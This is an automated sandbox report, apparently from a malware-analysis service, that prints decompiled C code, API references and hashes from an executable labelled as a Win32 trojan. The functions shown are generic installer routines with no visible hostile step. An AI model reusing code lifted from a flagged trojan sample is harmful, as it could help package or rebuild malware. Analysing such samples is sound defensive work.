                                                          					_t43 =  *(_t48 - 8) & 0x000000ff;
                                                          					if(_t43 <= 7) {
                                                          						switch( *((intOrPtr*)(_t43 * 4 +  &M740D2626))) {
                                                          							case 0:
                                                          								 *_t44 = 0;
                                                          								goto L17;
                                                          							case 1:
                                                          								__eax =  *__eax;
                                                          								if(__ecx > __ebx) {
                                                          									_v84 = __ecx;
                                                          									__ecx =  *(0x740d307c + __edx * 4);
                                                          									__edx = _v84;
                                                          									__ecx = __ecx * __edx;
                                                          									asm("sbb edx, edx");
                                                          									__edx = __edx & __ecx;
                                                          									__eax = __eax &  *(0x740d309c + __edx * 4);
                                                          								}
                                                          								_push(__eax);
                                                          								goto L15;
                                                          							case 2:
                                                          								__eax = E740D1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                          								goto L16;
                                                          							case 3:
                                                          								__eax = lstrcpynA(__edi,  *__eax,  *0x740d405c);
                                                          								goto L17;
                                                          							case 4:
                                                          								__ecx =  *0x740d405c;
                                                          								__edx = __ecx - 1;
                                                          								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                          								__eax =  *0x740d405c;
                                                          								 *((char*)(__eax + __edi - 1)) = __bl;
                                                          								goto L17;
                                                          							case 5:
                                                          								__ecx =  &_v80;
                                                          								_push(0x27);
                                                          								_push(__ecx);
                                                          								_push( *__eax);
                                                          								__imp__StringFromGUID2();
                                                          								__eax =  &_v92;
                                                          								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x740d405c, __ebx, __ebx);
                                                          								goto L17;
                                                          							case 6:
                                                          								_push( *__esi);
                                                          								L15:
                                                          								__eax = wsprintfA(__edi, 0x740d4000);
                                                          								L16:
                                                          								__esp = __esp + 0xc;
                                                          								goto L17;
                                                          						}
                                                          					}
                                                          					L17:
                                                          					_t30 =  *(_t48 + 0x14);
                                                          					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                                          						GlobalFree(_t30);
                                                          					}
                                                          					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                                          					if(_t31 != 0) {
                                                          						if(_t31 != 0xffffffff) {
                                                          							if(_t31 > 0) {
                                                          								E740D12D1(_t31 - 1, _t44);
                                                          								goto L26;
                                                          							}
                                                          						} else {
                                                          							E740D1266(_t44);
                                                          							L26:
                                                          						}
                                                          					}
                                                          					_v88 = _v88 - 1;
                                                          					_t48 = _t48 - 0x20;
                                                          				} while (_v88 >= 0);
                                                          				return GlobalFree(_t44);
                                                          			}














                                                          0x740d24e4
                                                          0x740d24e6
                                                          0x740d24f0
                                                          0x740d24f6
                                                          0x740d2500
                                                          0x740d2504
                                                          0x740d2509
                                                          0x740d2509
                                                          0x740d2511
                                                          0x740d2518
                                                          0x740d251e
                                                          0x00000000
                                                          0x740d2525
                                                          0x00000000
                                                          0x00000000
                                                          0x740d252c
                                                          0x740d2530
                                                          0x740d2533
                                                          0x740d2537
                                                          0x740d253e
                                                          0x740d2542
                                                          0x740d2548
                                                          0x740d254a
                                                          0x740d254c
                                                          0x740d254c
                                                          0x740d2553
                                                          0x00000000
                                                          0x00000000
                                                          0x740d255c
                                                          0x00000000
                                                          0x00000000
                                                          0x740d256c
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2598
                                                          0x740d25a0
                                                          0x740d25aa
                                                          0x740d25ac
                                                          0x740d25b1
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2574
                                                          0x740d2578
                                                          0x740d257a
                                                          0x740d257b
                                                          0x740d257d
                                                          0x740d258d
                                                          0x740d2594
                                                          0x00000000
                                                          0x00000000
                                                          0x740d25b7
                                                          0x740d25b9
                                                          0x740d25bf
                                                          0x740d25c5
                                                          0x740d25c5
                                                          0x00000000
                                                          0x00000000
                                                          0x740d251e
                                                          0x740d25c8
                                                          0x740d25c8
                                                          0x740d25cd
                                                          0x740d25de
                                                          0x740d25de
                                                          0x740d25e4
                                                          0x740d25e9
                                                          0x740d25ee
                                                          0x740d25fa
                                                          0x740d25ff
                                                          0x00000000
                                                          0x740d2604
                                                          0x740d25f0
                                                          0x740d25f1
                                                          0x740d2605
                                                          0x740d2605
                                                          0x740d25ee
                                                          0x740d2606
                                                          0x740d260a
                                                          0x740d260d
                                                          0x740d2625

                                                          APIs
                                                            • Part of subcall function 740D1215: GlobalAlloc.KERNEL32(00000040,740D1233,?,740D12CF,-740D404B,740D11AB,-000000A0), ref: 740D121D
                                                          • GlobalFree.KERNEL32 ref: 740D25DE
                                                          • GlobalFree.KERNEL32 ref: 740D2618
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211149237.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                          • Associated: 00000001.00000002.211137968.00000000740D0000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211158192.00000000740D3000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211175377.00000000740D5000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID: {t@ut
                                                          • API String ID: 1780285237-3262140062
                                                          • Opcode ID: 737bf672b0dc2dd6c990958ef37bd77b4e2e8a6602bd581561a75f9aadd9cd47
                                                          • Instruction ID: 21e48b0911ee9c815b61194850479af28a843722c6d404de41c14aa1a6691119
                                                          • Opcode Fuzzy Hash: 737bf672b0dc2dd6c990958ef37bd77b4e2e8a6602bd581561a75f9aadd9cd47
                                                          • Instruction Fuzzy Hash: EC419D72204300EFD3069F65CDA4E6E7BBAEB85A04B14456DFA4286114DB31AA0C9F62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E740D22F1(void* __edx, intOrPtr _a4) {
                                                          				signed int _v4;
                                                          				signed int _v8;
                                                          				void* _t38;
                                                          				signed int _t39;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void* _t48;
                                                          				signed int* _t50;
                                                          				signed char* _t51;
                                                          
                                                          				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                          				while(1) {
                                                          					_t9 = _a4 + 0x818; // 0x818
                                                          					_t51 = (_v8 << 5) + _t9;
                                                          					_t38 = _t51[0x18];
                                                          					if(_t38 == 0) {
                                                          						goto L9;
                                                          					}
                                                          					_t48 = 0x1a;
                                                          					if(_t38 == _t48) {
                                                          						goto L9;
                                                          					}
                                                          					if(_t38 != 0xffffffff) {
                                                          						if(_t38 <= 0 || _t38 > 0x19) {
                                                          							_t51[0x18] = _t48;
                                                          						} else {
                                                          							_t38 = E740D12AD(_t38 - 1);
                                                          							L10:
                                                          						}
                                                          						goto L11;
                                                          					} else {
                                                          						_t38 = E740D123B();
                                                          						L11:
                                                          						_t43 = _t38;
                                                          						_t13 =  &(_t51[8]); // 0x820
                                                          						_t50 = _t13;
                                                          						if(_t51[4] >= 0) {
                                                          						}
                                                          						_t39 =  *_t51 & 0x000000ff;
                                                          						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                                          						_v4 = _t39;
                                                          						if(_t39 > 7) {
                                                          							L27:
                                                          							_t40 = GlobalFree(_t43);
                                                          							if(_v8 == 0) {
                                                          								return _t40;
                                                          							}
                                                          							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                          								_v8 = _v8 + 1;
                                                          							} else {
                                                          								_v8 = _v8 & 0x00000000;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          							switch( *((intOrPtr*)(_t39 * 4 +  &M740D247E))) {
                                                          								case 0:
                                                          									 *_t50 =  *_t50 & 0x00000000;
                                                          									goto L27;
                                                          								case 1:
                                                          									__eax = E740D12FE(__ebx);
                                                          									goto L20;
                                                          								case 2:
                                                          									 *__ebp = E740D12FE(__ebx);
                                                          									_a4 = __edx;
                                                          									goto L27;
                                                          								case 3:
                                                          									__eax = E740D1224(__ebx);
                                                          									 *(__esi + 0x1c) = __eax;
                                                          									L20:
                                                          									 *__ebp = __eax;
                                                          									goto L27;
                                                          								case 4:
                                                          									 *0x740d405c =  *0x740d405c +  *0x740d405c;
                                                          									__edi = GlobalAlloc(0x40,  *0x740d405c +  *0x740d405c);
                                                          									 *0x740d405c = MultiByteToWideChar(0, 0, __ebx,  *0x740d405c, __edi,  *0x740d405c);
                                                          									if(_v4 != 5) {
                                                          										 *(__esi + 0x1c) = __edi;
                                                          										 *__ebp = __edi;
                                                          									} else {
                                                          										__eax = GlobalAlloc(0x40, 0x10);
                                                          										_push(__eax);
                                                          										 *(__esi + 0x1c) = __eax;
                                                          										_push(__edi);
                                                          										 *__ebp = __eax;
                                                          										__imp__CLSIDFromString();
                                                          										__eax = GlobalFree(__edi);
                                                          									}
                                                          									goto L27;
                                                          								case 5:
                                                          									if( *__ebx != 0) {
                                                          										__eax = E740D12FE(__ebx);
                                                          										 *__edi = __eax;
                                                          									}
                                                          									goto L27;
                                                          								case 6:
                                                          									__esi =  *(__esi + 0x18);
                                                          									__esi = __esi - 1;
                                                          									__esi = __esi *  *0x740d405c;
                                                          									__esi = __esi +  *0x740d4064;
                                                          									__eax = __esi + 0xc;
                                                          									 *__edi = __esi + 0xc;
                                                          									asm("cdq");
                                                          									__eax = E740D1429(__edx, __esi + 0xc, __edx, __esi);
                                                          									goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					L9:
                                                          					_t38 = E740D1224(0x740d4034);
                                                          					goto L10;
                                                          				}
                                                          			}












                                                          0x740d2306
                                                          0x740d230a
                                                          0x740d2315
                                                          0x740d2315
                                                          0x740d231c
                                                          0x740d2321
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2325
                                                          0x740d2328
                                                          0x00000000
                                                          0x00000000
                                                          0x740d232d
                                                          0x740d2338
                                                          0x740d2348
                                                          0x740d233f
                                                          0x740d2341
                                                          0x740d2357
                                                          0x740d2357
                                                          0x00000000
                                                          0x740d232f
                                                          0x740d232f
                                                          0x740d2358
                                                          0x740d235c
                                                          0x740d235e
                                                          0x740d235e
                                                          0x740d2361
                                                          0x740d2361
                                                          0x740d2369
                                                          0x740d236c
                                                          0x740d2373
                                                          0x740d2377
                                                          0x740d2446
                                                          0x740d2447
                                                          0x740d2452
                                                          0x740d247d
                                                          0x740d247d
                                                          0x740d2462
                                                          0x740d246e
                                                          0x740d2464
                                                          0x740d2464
                                                          0x740d2464
                                                          0x00000000
                                                          0x740d237d
                                                          0x740d237d
                                                          0x00000000
                                                          0x740d2384
                                                          0x00000000
                                                          0x00000000
                                                          0x740d238d
                                                          0x00000000
                                                          0x00000000
                                                          0x740d239b
                                                          0x740d239e
                                                          0x00000000
                                                          0x00000000
                                                          0x740d23a7
                                                          0x740d23ac
                                                          0x740d23af
                                                          0x740d23b0
                                                          0x00000000
                                                          0x00000000
                                                          0x740d23bd
                                                          0x740d23c8
                                                          0x740d23d7
                                                          0x740d23e2
                                                          0x740d2405
                                                          0x740d2408
                                                          0x740d23e4
                                                          0x740d23e8
                                                          0x740d23ee
                                                          0x740d23ef
                                                          0x740d23f2
                                                          0x740d23f3
                                                          0x740d23f6
                                                          0x740d23fd
                                                          0x740d23fd
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2410
                                                          0x740d2413
                                                          0x740d241f
                                                          0x740d2421
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2424
                                                          0x740d2427
                                                          0x740d2428
                                                          0x740d242f
                                                          0x740d2436
                                                          0x740d2439
                                                          0x740d243b
                                                          0x740d243e
                                                          0x00000000
                                                          0x00000000
                                                          0x740d237d
                                                          0x740d2377
                                                          0x740d234d
                                                          0x740d2352
                                                          0x00000000
                                                          0x740d2352

                                                          APIs
                                                          • GlobalFree.KERNEL32 ref: 740D2447
                                                            • Part of subcall function 740D1224: lstrcpynA.KERNEL32(00000000,?,740D12CF,-740D404B,740D11AB,-000000A0), ref: 740D1234
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 740D23C2
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 740D23D7
                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 740D23E8
                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 740D23F6
                                                          • GlobalFree.KERNEL32 ref: 740D23FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211149237.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                          • Associated: 00000001.00000002.211137968.00000000740D0000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211158192.00000000740D3000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211175377.00000000740D5000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                          • String ID: @ut
                                                          • API String ID: 3730416702-3384101347
                                                          • Opcode ID: 192b0bb516bef2d16f33539eab7905b918ddcf36048959bf459e0ec4ae019faa
                                                          • Instruction ID: 3e2a0a129d4b3f57b896664a76cebf592b1cb0ddceb7deb8afc0f0cc180fc91e
                                                          • Opcode Fuzzy Hash: 192b0bb516bef2d16f33539eab7905b918ddcf36048959bf459e0ec4ae019faa
                                                          • Instruction Fuzzy Hash: 66418E71608301EFE3119F368844B6A7BF9FF40B25F14492EE946DA151DB70964DCF62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406528(CHAR* _a4) {
                                                          				char _t5;
                                                          				char _t7;
                                                          				char* _t15;
                                                          				char* _t16;
                                                          				CHAR* _t17;
                                                          
                                                          				_t17 = _a4;
                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                          					_t17 =  &(_t17[4]);
                                                          				}
                                                          				if( *_t17 != 0 && E00405C52(_t17) != 0) {
                                                          					_t17 =  &(_t17[2]);
                                                          				}
                                                          				_t5 =  *_t17;
                                                          				_t15 = _t17;
                                                          				_t16 = _t17;
                                                          				if(_t5 != 0) {
                                                          					do {
                                                          						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
                                                          							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						_t17 = CharNextA(_t17);
                                                          						_t5 =  *_t17;
                                                          					} while (_t5 != 0);
                                                          				}
                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, _t16);
                                                          					_t7 =  *_t16;
                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                          						break;
                                                          					}
                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                          					if(_t15 < _t16) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t7;
                                                          			}








                                                          0x0040652a
                                                          0x00406532
                                                          0x00406546
                                                          0x00406546
                                                          0x0040654c
                                                          0x00406559
                                                          0x00406559
                                                          0x0040655a
                                                          0x0040655c
                                                          0x00406560
                                                          0x00406562
                                                          0x0040656b
                                                          0x0040656d
                                                          0x00406587
                                                          0x0040658f
                                                          0x0040658f
                                                          0x00406594
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659c
                                                          0x0040659d
                                                          0x004065a0
                                                          0x004065a8
                                                          0x004065aa
                                                          0x004065ae
                                                          0x00000000
                                                          0x00000000
                                                          0x004065b4
                                                          0x004065b9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004065b9
                                                          0x004065be

                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                          • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                          Strings
                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" , xrefs: 00406564
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
                                                          • *?|<>/":, xrefs: 00406570
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-2505432427
                                                          • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                          • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                          • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                          • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				long _t39;
                                                          				long _t41;
                                                          				void* _t44;
                                                          				signed char _t50;
                                                          				long* _t54;
                                                          
                                                          				if(_a4 + 0xfffffecd > 5) {
                                                          					L18:
                                                          					return 0;
                                                          				}
                                                          				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                          					goto L18;
                                                          				} else {
                                                          					_t50 = _t54[5];
                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                          						goto L18;
                                                          					}
                                                          					_t39 =  *_t54;
                                                          					if((_t50 & 0x00000002) != 0) {
                                                          						_t39 = GetSysColor(_t39);
                                                          					}
                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                          						SetTextColor(_a8, _t39);
                                                          					}
                                                          					SetBkMode(_a8, _t54[4]);
                                                          					_t41 = _t54[1];
                                                          					_v16.lbColor = _t41;
                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                          						_t41 = GetSysColor(_t41);
                                                          						_v16.lbColor = _t41;
                                                          					}
                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                          						SetBkColor(_a8, _t41);
                                                          					}
                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                          						_v16.lbStyle = _t54[2];
                                                          						_t44 = _t54[3];
                                                          						if(_t44 != 0) {
                                                          							DeleteObject(_t44);
                                                          						}
                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                          					}
                                                          					return _t54[3];
                                                          				}
                                                          			}









                                                          0x0040434a
                                                          0x00404400
                                                          0x00000000
                                                          0x00404400
                                                          0x0040435b
                                                          0x0040435f
                                                          0x00000000
                                                          0x00404379
                                                          0x00404379
                                                          0x00404382
                                                          0x00000000
                                                          0x00000000
                                                          0x00404384
                                                          0x00404390
                                                          0x00404393
                                                          0x00404393
                                                          0x00404399
                                                          0x0040439f
                                                          0x0040439f
                                                          0x004043ab
                                                          0x004043b1
                                                          0x004043b8
                                                          0x004043bb
                                                          0x004043be
                                                          0x004043c0
                                                          0x004043c0
                                                          0x004043c8
                                                          0x004043ce
                                                          0x004043ce
                                                          0x004043d8
                                                          0x004043dd
                                                          0x004043e0
                                                          0x004043e5
                                                          0x004043e8
                                                          0x004043e8
                                                          0x004043f8
                                                          0x004043f8
                                                          0x00000000
                                                          0x004043fb

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405374(CHAR* _a4, CHAR* _a8) {
                                                          				struct HWND__* _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v32;
                                                          				long _v44;
                                                          				int _v48;
                                                          				void* _v52;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				CHAR* _t26;
                                                          				signed int _t27;
                                                          				CHAR* _t28;
                                                          				long _t29;
                                                          				signed int _t39;
                                                          
                                                          				_t26 =  *0x42ec24; // 0x0
                                                          				_v8 = _t26;
                                                          				if(_t26 != 0) {
                                                          					_t27 =  *0x42f514;
                                                          					_v12 = _t27;
                                                          					_t39 = _t27 & 0x00000001;
                                                          					if(_t39 == 0) {
                                                          						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
                                                          					}
                                                          					_t26 = lstrlenA(0x42a098);
                                                          					_a4 = _t26;
                                                          					if(_a8 == 0) {
                                                          						L6:
                                                          						if((_v12 & 0x00000004) == 0) {
                                                          							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
                                                          						}
                                                          						if((_v12 & 0x00000002) == 0) {
                                                          							_v32 = 0x42a098;
                                                          							_v52 = 1;
                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                          							_v44 = 0;
                                                          							_v48 = _t29 - _t39;
                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                          						}
                                                          						if(_t39 != 0) {
                                                          							_t28 = _a4;
                                                          							 *((char*)(_t28 + 0x42a098)) = 0;
                                                          							return _t28;
                                                          						}
                                                          					} else {
                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                          						if(_t26 < 0x800) {
                                                          							_t26 = lstrcatA(0x42a098, _a8);
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t26;
                                                          			}

















                                                          0x0040537a
                                                          0x00405386
                                                          0x00405389
                                                          0x0040538f
                                                          0x0040539b
                                                          0x0040539e
                                                          0x004053a1
                                                          0x004053a7
                                                          0x004053a7
                                                          0x004053ad
                                                          0x004053b5
                                                          0x004053b8
                                                          0x004053d5
                                                          0x004053d9
                                                          0x004053e2
                                                          0x004053e2
                                                          0x004053ec
                                                          0x004053f5
                                                          0x00405401
                                                          0x00405408
                                                          0x0040540c
                                                          0x0040540f
                                                          0x00405422
                                                          0x00405430
                                                          0x00405430
                                                          0x00405434
                                                          0x00405436
                                                          0x00405439
                                                          0x00000000
                                                          0x00405439
                                                          0x004053ba
                                                          0x004053c2
                                                          0x004053ca
                                                          0x004053d0
                                                          0x00000000
                                                          0x004053d0
                                                          0x004053ca
                                                          0x004053b8
                                                          0x00405443

                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                          • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                          • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                          • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                          • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                          • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                          • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402E52(intOrPtr _a4) {
                                                          				char _v68;
                                                          				long _t6;
                                                          				struct HWND__* _t7;
                                                          				struct HWND__* _t15;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t15 =  *0x42946c;
                                                          					if(_t15 != 0) {
                                                          						_t15 = DestroyWindow(_t15);
                                                          					}
                                                          					 *0x42946c = 0;
                                                          					return _t15;
                                                          				}
                                                          				if( *0x42946c != 0) {
                                                          					return E00406692(0);
                                                          				}
                                                          				_t6 = GetTickCount();
                                                          				if(_t6 >  *0x42f450) {
                                                          					if( *0x42f448 == 0) {
                                                          						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
                                                          						 *0x42946c = _t7;
                                                          						return ShowWindow(_t7, 5);
                                                          					}
                                                          					if(( *0x42f514 & 0x00000001) != 0) {
                                                          						wsprintfA( &_v68, "... %d%%", E00402E36());
                                                          						return E00405374(0,  &_v68);
                                                          					}
                                                          				}
                                                          				return _t6;
                                                          			}







                                                          0x00402e5e
                                                          0x00402e60
                                                          0x00402e67
                                                          0x00402e6a
                                                          0x00402e6a
                                                          0x00402e70
                                                          0x00000000
                                                          0x00402e70
                                                          0x00402e7e
                                                          0x00000000
                                                          0x00402e81
                                                          0x00402e88
                                                          0x00402e94
                                                          0x00402e9c
                                                          0x00402eda
                                                          0x00402ee3
                                                          0x00000000
                                                          0x00402ee8
                                                          0x00402ea5
                                                          0x00402eb6
                                                          0x00000000
                                                          0x00402ec4
                                                          0x00402ea5
                                                          0x00402ef0

                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                          • GetTickCount.KERNEL32 ref: 00402E88
                                                          • wsprintfA.USER32 ref: 00402EB6
                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
